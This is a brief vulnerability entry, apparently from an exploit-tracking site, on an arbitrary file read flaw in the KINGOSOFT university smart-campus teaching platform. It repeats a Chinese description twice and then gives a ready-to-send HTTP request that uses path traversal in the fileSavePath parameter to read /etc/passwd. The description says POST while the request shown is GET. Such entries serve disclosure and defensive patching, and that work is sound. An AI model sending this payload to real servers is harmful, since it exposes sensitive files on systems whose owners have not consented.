Description
KINGOSOFT高校智慧校园教学综合服务平台存在任意文件读取漏洞,攻击者可通过向/jw/lessonchangeapply/jwComFileDownload.action发送包含路径遍历字符(../../)的POST请求,读取服务器上的敏感文件。
KINGOSOFT高校智慧校园教学综合服务平台存在任意文件读取漏洞,攻击者可通过向/jw/lessonchangeapply/jwComFileDownload.action发送包含路径遍历字符(../../)的POST请求,读取服务器上的敏感文件。
GET /jw/lessonchangeapply/jwComFileDownload.action?fileSavePath=../../../../../../../etc/passwd&name= HTTP/1.1
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.